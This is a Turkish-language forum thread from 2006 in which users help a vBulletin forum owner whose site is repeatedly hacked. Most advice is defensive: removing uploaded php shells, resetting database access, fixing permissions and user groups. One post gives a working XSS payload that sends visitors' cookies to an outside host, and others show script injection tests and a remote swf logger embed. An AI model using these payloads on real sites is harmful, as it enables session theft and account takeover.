• 20-07-2006, 12:27:34
    #10
    bir defa bi şekiled ftp ye girdiyseler
    php listpath veya phpshell scriptleri atmışlardır çelitli directory lere ordan tekrar tekrar hackleyebilri kendilerine admin yazabilirler vbulletinde,
    bunun için vbulletin admin panelden vbulletin dosya sürüm kontrolü yaptır orda vbulletin dosyası olmayan dosylarıda söleyecektir onları sil eyer bilmediğin dosya varsa
    bide cpanel iletişim mailini kontrol et deyiştirmişseler ordan tekrar tekrar şifre istetebilirler

    yada yine mysql e adamlar kendi ip lerine giriş izni eklemişlerdir
    böylece kendi pc sinden senin sitenin sql ine bağlanıp( config.php deki db bilgileri ile) ordan tablolardaki admin lerin şifre hasini kendilerine hazırladıkları bakça bir has ile deyiştirip tekrar admin olabilirler
    bunu önlemek için cpanel den adamların eyer mysql e giriş izni varsa onların ip yi sil ve db şifreni deyiş yeniden config.php yi ayarla

    bunun dışında klasörlerin chmod larını kontrol et yalnış chmod varsa rahat rahat dosya yükleyip(phplistpath veya phpshell) tekrar admin olup hackleyebilirler

    ek olarak
    sitende vbulletin dışında kurulu ( sub domain lerdede kurulu olabilir) başka script varsa onların açığı var olabilir

    yine server daki bazı yazılımlarda açık olabilir server yazılımlarını güncelle

    vs vs vs böyle uzatabilirim daha
  • 20-07-2006, 12:28:47
    #11
    ha ek olarak
    config.php yide kontrol et adamlar ordan admin vs eklemişseler kendi user id lerine onlarıda sil
  • 20-07-2006, 12:42:01
    #12
    Holyboy doğru söylüyor.

    vB'nin açığı değildir o, sunucunuz php listpath veya phpshell'leri yiyordur büyük ihtimal ile.

    r57 ile bir tanedaha dosya vardı bu shell dosyaları ile config.php ye girip mysql kullanıcı adı ve şifresini öğreniyorlar ve diğer shell dosyası ile mysql e bağlanıyorlar. Öğrendikler mysql bilgileri ile sitenin mysql i bağlanıp admin kullanıcısının md5 li şifresini kendi md5'li şifreleri ile değiştitiyorlar.
  • 20-07-2006, 12:48:57
    #13
    Üyeliği durduruldu
    Arkadaşım modaratör ve admin kullanıcı gruplarını halka acık grup yapmışsın senin konularını admin panelinden değil site üzerinden siliyorlar

    ayarlamayı unutmuşsun. Genelde unutulan bişeydir üye olup kontrol panelinden kullanıcı grubu seceneklerinden kendisini mod veya admin yapabilir. ve böylece siler

    onu kontrol et
  • 20-07-2006, 13:04:11
    #14
    Üyeliği durduruldu
    Cooikeni caliyorlardir Nede olsa session`lar silinmiyor.
  • 20-07-2006, 13:52:53
    #15
    Üyeliği durduruldu
    Arkadaşlar teşekkürler önerileriniz için
    Hepsini tek tek deneyecek ve gerekli düzenlemeleri yapacağım
    Başka fikri olan varsa belirtirse sevinirim

    Alıntı
    Cooikeni caliyorlardir Nede olsa session`lar silinmiyor.
    bizimde şüphelendiğimiz buydu zaten. peki bunu nasıl halledebilirim?

    Hepinize şimdiden teşekkürler
    Sağolun
  • 20-07-2006, 14:05:34
    #16
    Üyeliği durduruldu
    Js ile alert verdirmek suretiyle cooikeni calabilir.

    <B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'s
    ss=`i=new/**/Image();i.src='http://www.ULusaL.com/cookie/c.php?c='+document.co
    okie;this.sss=null`style='font-size:0; X="<B ">'</B>
    Gene ayni sekilde [b] [i] kodlarin acik ise

    <b C=">" onmouseover="alert('ULusaL')" X="<b "> HedeHodo </b>
    Bu tarzda alert kodunu gelistirirek msjlarina mouse ile gelindiginde cooike calabilir.

    Avatar`a kod saklar

    Forum a actigi yeni bir konunun icerine kod koyabilir.

    Hatta bir adim daha oteye gidip .jpg resminin icin .config ypar .php`ye cevirir (777)

    daha zebille yontem war yeterki forum vb veya smf olsun.

    engelleyemessin bir yama yoq benim bildigim

    Belki bende kendi avatarima qoydum ne malum
  • 20-07-2006, 14:22:11
    #17
    Üyeliği durduruldu
    Kimin yaptigni biliyorsan engellersin ama adamin kullanabilecegi siteleri engellemek gibi karmasik bisi basitce boyle bir kod sanirim ama gelistirmek gerek

    <html>
    <form target="_blank_ onsubmit"=return ShowFormWarning()" action"=hebelehubele ................................. >
    <xembed src="http//www.sanasaldirankisi.com/log.swf" width="1" Height="1">
    </xembed>

    Birde vb formlarda ise yarar mi bilmiyorum daha denemedim ama ws lerde yariyor.maxat html vs js engellemek

    msql daki config.php dosyasini include et. <? include("../xss.php"); gibi
    Sayfaya bastirdigin veriyi ogreniyorsun $ulusal degiskeni gibi
    Sonra filtreliyorsun hocam $ulusal = securityihtml($text); yani bastirmak istedigimiz degiskeni bu sekilde filtrelersin
    oldumu diyede denemek isteren <script>alert(document.cookie)</script gibi bir js ile deneme yapabilirsin.

    rep isterim
  • 20-07-2006, 15:27:54
    #18
    Üyeliği durduruldu
    ilk mesajına : bizim forumda üye değilsin dimi ?

    ikinci mesajına : akşam deneyeceğim teşekkürler

    rep olayına gelince verrik

    Teşekkürler